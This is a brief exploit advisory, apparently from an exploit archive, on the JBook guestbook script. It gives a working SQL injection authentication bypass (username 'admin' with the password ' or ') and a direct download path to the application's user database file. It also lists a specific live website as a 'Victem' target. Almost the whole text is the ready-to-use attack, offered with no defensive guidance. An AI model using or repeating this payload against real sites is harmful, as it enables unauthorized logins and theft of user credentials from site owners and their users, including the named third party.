JBook suffers from a remote SQL injection vulnerability that allows for authentication bypass and also suffers from a direct database download.
5420b0d21aa0a8efbfc163ce12f6859e4147cac477755f20bfa611ded2217796
#########################################################
---------------------------------------------------------
Portal Name: Jbook
Download :
http://www.planet-source-code.com/vb/scripts/ShowCode.asp?lngWId=4&txtCodeId=6258
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,DD)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/
User:admin
pass:' or '
[DD]:
http://site.com/[Path]/userids.mdb
---------------------------------
Victem :
http://www.naseiran.ir/jboook